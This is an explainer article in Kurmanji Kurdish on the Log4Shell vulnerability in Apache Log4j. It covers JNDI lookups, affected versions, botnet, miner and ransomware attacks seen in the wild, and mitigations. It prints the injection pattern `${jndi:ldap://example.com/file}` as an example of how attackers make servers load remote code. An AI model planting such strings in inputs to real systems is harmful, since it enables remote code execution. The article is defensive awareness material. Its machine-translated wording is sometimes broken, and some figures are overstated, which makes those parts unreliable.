Table of Contents[Veşartin][Rêdan]
Di dawiya Mijdara 2021-an de, me xetereyek mezin a li ser ewlehiya sîber derxist holê. Ev îstîsmar dê li çaraliyê cîhanê bandorê li mîlyonan pergalên komputerê bike.
Ev rêbernameyek li ser lawaziya Log4j ye û çawa xeletiyek sêwiranê ya ji nedîtî ve hat hişt ku 90% ji karûbarên komputerê yên cîhanê ji êrîşê re vekirî bimîne.
Apache Log4j amûrek têketina Java-ya-çavkaniya vekirî ye ku ji hêla Weqfa Nermalava Apache ve hatî pêşve xistin. Di eslê xwe de ji hêla Ceki Gülcü ve di 2001 de hatî nivîsandin, ew naha beşek ji Karûbarên Logging Apache ye, projeyek Weqfa Nermalava Apache.
Pargîdaniyên li çaraliyê cîhanê pirtûkxaneya Log4j bikar tînin da ku têketina serîlêdanên xwe çalak bikin. Bi rastî, pirtûkxaneya Java ew qas berbelav e, hûn dikarin wê di serîlêdanên ji Amazon, Microsoft, Google, û hêj bêtir bibînin.
Girîngiya pirtûkxaneyê tê vê wateyê ku her xeletiyek potansiyel a kodê dikare bi mîlyonan komputer ji hackkirinê re vekirî bihêle. Di 24ê Mijdara 2021ê de, a ewlehiya cloud lêkolînerê ku ji bo Alibaba dixebite xeletiyek tirsnak kifş kir.
Qelsiya Log4j, ku bi navê Log4Shell jî tê zanîn, ji sala 2013-an vir ve bê hay bû. Qelsbûnê hişt ku aktorên xerab kodê li ser pergalên bandorkirî yên ku Log4j dimeşînin bimeşînin. Ew di 9-ê Kanûna Pêşîn, 2021-an de bi gelemperî hate eşkere kirin
Pisporên pîşesaziyê ji xeletiya Log4Shell re dibêjin lewaziya herî mezin di bîra dawî de.
Di hefteya piştî weşandina xirapbûnê de, tîmên ewlehiya sîber bi mîlyonan êrîş tespît kirin. Hin lêkolîner tewra rêjeyek ji sed êrîşan di hûrdemê de jî dîtin.
Çawa dixebite?
Ji bo ku fêm bikin ka çima Log4Shell ew qas xeternak e, divê em fam bikin ka ew çi jêhatî ye.
Zehfbûna Log4Shell destûrê dide darvekirina kodê keyfî, ku di bingeh de tê vê wateyê ku êrîşkar dikare her ferman an kodek li ser makîneyek armanc bimeşîne.
Çawa vê yekê pêk tîne?
Pêşîn, divê em fêm bikin ku JNDI çi ye.
Navbera Navdêr û Rêvebiriya Java (JNDI) karûbarek Java-yê ye ku dihêle bernameyên Java-yê bi navekî dane û çavkaniyan keşf bikin û bigerin. Van karûbarên pelrêça girîng in ji ber ku ew komek tomar organîzekirî peyda dikin ji bo pêşdebiran ku bi hêsanî referans bikin dema ku serîlêdanan diafirînin.
JNDI dikare protokolên cihêreng bikar bîne da ku bigihîje pelrêçekek diyar. Yek ji van protokolan Protokola Gihîştina Destûra Lightweight, an jî LDAP e.
Dema ku rêzek tê tomar kirin, log4j dema ku rûbirûyî biwêjên formê dibin cîgirkirina rêzan pêk tîne ${prefix:name}
.
Bo nimûne, Text: ${java:version}
dibe ku wekî Nivîsar were tomarkirin: Java versiyona 1.8.0_65. Bi vî rengî veguhertinên gelemperî ne.
Em dikarin bêjeyên wekî Text: ${jndi:ldap://example.com/file}
ku pergala JNDI bikar tîne da ku bi protokola LDAP-ê ji URL-ê tiştek Java-yê bar bike.
Ev bi bandor daneyên ku ji wê URL-ê tê li makîneyê bar dike. Her hackerek potansiyel dikare koda xerab li ser URL-ya gelemperî mêvandar bike û li benda makîneyên ku Log4j bikar tînin ji bo têketinê bimîne.
Ji ber ku naveroka peyamên têketinê daneyên ku ji hêla bikarhêner ve têne kontrol kirin dihewîne, hacker dikarin referansên xwe yên JNDI-yê ku nîşanî serverên LDAP-ê yên ku ew kontrol dikin destnîşan bikin. Van pêşkêşkerên LDAP-ê dikarin tijî tiştên Java-yê yên xerab bin ku JNDI dikare bi qelsbûnê ve bicîh bike.
Ya ku vê yekê xirabtir dike ev e ku ne girîng e ku serîlêdan serîlêdanek server-aliyê ye an serîlêdanek ji hêla xerîdar be.
Heya ku rêyek ji bo tomarkirinê hebe ku koda xirabkar a êrîşkar bixwîne, serîlêdan hîn jî ji îstîsmaran re vekirî ye.
Kî bandor kirin?
Zelalbûn bandorê li ser hemî pergal û karûbarên ku APache Log4j bikar tînin, bi guhertoyên 2.0 heya 2.14.1 û di nav de, dike.
Gelek pisporên ewlehiyê şîret dikin ku dibe ku qelsî bandorê li hejmarek serîlêdanên ku Java-yê bikar tînin bandor bike.
Ev xeletî yekem car di lîstika vîdyoyê ya Minecraft ya Microsoft-ê de hate dîtin. Microsoft gazî bikarhênerên xwe kir ku nermalava xweya Java-ya Minecraft nûve bikin da ku pêşî li her xetereyê bigirin.
Jen Easterly, Rêvebirê Ajansa Ewlekariya Sîber û Binesaziyê (CISA) dibêje ku firoşkaran xwedî berpirsiyariya sereke ji bo pêşîgirtina bikarhênerên dawî ji aktorên xerab ên ku vê qelsiyê îstismar dikin.
"Divê firoşkar bi xerîdarên xwe re jî danûstendinê bikin da ku bikarhênerên dawîn zanibin ku hilbera wan vê qelsiyê dihewîne û divê pêşî li nûvekirinên nermalavê bigire."
Hat ragihandin ku êrîşan ji niha ve dest pê kirine. Symantec, pargîdaniyek ku nermalava ewlehiya sîber peyda dike, hejmarek cûrbecûr daxwazên êrîşê dîtiye.
Li vir çend mînakên celebên êrîşan hene ku lêkolîneran tespît kirine:
- botnets
Botnet torgilokek komputeran e ku di bin kontrola partiyek êrîşkar de ne. Ew alîkariya pêkanîna êrîşên DDoS, dizîna daneyan, û xapandinên din dikin. Lekolînwanan botneta Muhstik di skrîptên şêlê de ku ji îstismara Log4j hatine dakêşandin, dîtin.
- XMRig Miner Trojan
XMRig mînerek pereyê krîpto-çavkaniya vekirî ye ku CPU-yan bikar tîne da ku nîşana Monero-yê hilîne. Sûcdarên sîber dikarin XMRig li ser cîhazên mirovan saz bikin da ku ew bêyî agahdariya wan hêza xwe ya pêvajoyê bikar bînin.
- Khonsari Ransomware
Ransomware forma malware-ya ku jê hatî çêkirin vedibêje pelan şîfre bikin li ser komputerê. Dûv re êrîşkar dikarin di berdêla vegerandina gihîştina pelên şîfrekirî de pereyan bixwazin. Lekolînwanan di êrîşên Log4Shell de ransomware Khonsari keşf kirin. Ew serverên Windows-ê dikin hedef û çarçoveya .NET bikar tînin.
Çi dibe?
Pispor pêşbînî dikin ku dibe ku bi mehan an belkî sal jî bidome da ku kaosa ku ji hêla qelsiya Log4J ve hatî çêkirin bi tevahî rast bike.
Ev pêvajo nûvekirina her pergala bandorkirî bi guhertoyek patched ve girêdayî ye. Tewra ku ev hemî pergal werin paqij kirin, dîsa jî xetereya paşverûyên muhtemel heye ku hackeran berê li pencereya ku server ji bo êrîşê vekirî bûn zêde kirine.
Gelek çareserî û kêmkirinan heye ku pêşî li îstismarkirina sepanan ji hêla vê xeletiyê ve bigire. Guhertoya nû ya Log4j 2.15.0-rc1 mîhengên cihêreng guhert da ku vê qelsiyê kêm bike.
Hemî taybetmendiyên ku JNDI bikar tînin dê ji hêla xwerû ve bêne neçalak kirin û lêgerînên ji dûr ve jî hatine qedexe kirin. Neçalakkirina taybetmendiya lêgerînê ya li ser sazkirina Log4j-ya we dê bibe alîkar ku xetera îstismarên gengaz kêm bike.
Li derveyî Log4j, hîn jî pêdivî bi plansaziyek berfireh heye ku pêşî li keşfên çavkaniya vekirî bigire.
Di destpêka Gulanê de, Qesra Spî an fermana rêvebirinê ku armanc ew bû ku ewlehiya sîber ya neteweyî baştir bike. Ew ji bo fatûreya nermalava materyalê (SBOM) ku bi bingehîn belgeyek fermî bû ku navnîşek her tiştê ku ji bo avakirina serîlêdanê hewce dike vedihewîne.
Ev di nav de beşên wek çavkaniya vekirî pakêt, girêdayî, û API-yên ku ji bo pêşkeftinê têne bikar anîn. Her çend ramana SBOM-ê ji bo şefafiyê alîkar be jî, gelo ew ê bi rastî alîkariya xerîdar bike?
Dibe ku nûvekirina pêwendiyan pir pir dijwar be. Pargîdanî dikarin tenê hilbijêrin ku ji bo dîtina pakêtên alternatîf neyên windakirina wextê zêde bidin. Dibe ku ev SBOM tenê heke wan bikêr bin çarçoveya bêtir sînorkirî ye.
Xelasî
Pirsgirêka Log4j ji bo rêxistinan tenê pirsgirêkek teknîkî ye.
Divê rêberên karsaziyê hay ji xetereyên potansiyel ên ku dikarin çêbibin dema ku server, hilber, an karûbarên wan xwe dispêrin kodê ku ew bixwe neparêzin.
Pişta xwe bi serîlêdanên çavkaniya vekirî û partiya sêyemîn ve her gav bi hin xetereyê re tê. Pêdivî ye ku pargîdanî berî ku xetereyên nû derkevin holê, stratejiyên kêmkirina xetereyê bixebitînin.
Piraniya tevneyê xwe dispêre nermalava çavkaniya vekirî ya ku ji hêla bi hezaran dilxwazên li çaraliyê cîhanê ve têne parastin.
Ger em dixwazin tevneyê cîhek ewledar bihêlin, divê hukûmet û pargîdanî di fînansekirina hewildanên çavkaniya vekirî û ajansên ewlehiya sîberê yên wekî CISA.
Leave a Reply